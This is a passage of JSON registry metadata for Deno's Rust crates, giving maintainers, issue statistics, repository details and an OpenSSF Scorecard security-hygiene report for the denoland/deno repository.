"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_inspector_server/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_inspector_server/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_inspector_server/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_inspector_server/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_inspector_server/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_inspector_server/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-02-28T00:36:04.720Z","updated_at":"2026-02-28T00:36:04.720Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-02-28T00:36:04.781Z","updated_at":"2026-02-28T00:36:04.781Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":8802578,"name":"deno_canvas","ecosystem":"cargo","description":"OffscreenCanvas implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":104,"first_release_published_at":"2024-01-25T03:27:29.555Z","latest_release_published_at":"2026-08-27T15:22:13.089Z","latest_release_number":"0.120.0","last_synced_at":"2026-08-29T21:56:51.206Z","created_at":"2024-01-25T03:30:28.458Z","updated_at":"2026-08-29T21:56:51.207Z","registry_url":"https://crates.io/crates/deno_canvas/","install_command":"cargo install deno_canvas","documentation_url":"https://docs.rs/deno_canvas/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-14T18:00:32.000Z","size":246768,"stargazers_count":108238,"open_issues_count":1496,"forks_count":6339,"subscribers_count":1425,"default_branch":"main","last_synced_at":"2026-08-15T12:07:29.515Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-15T11:22:15.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36685524,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-15T02:00:05.847Z","response_time":94,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.c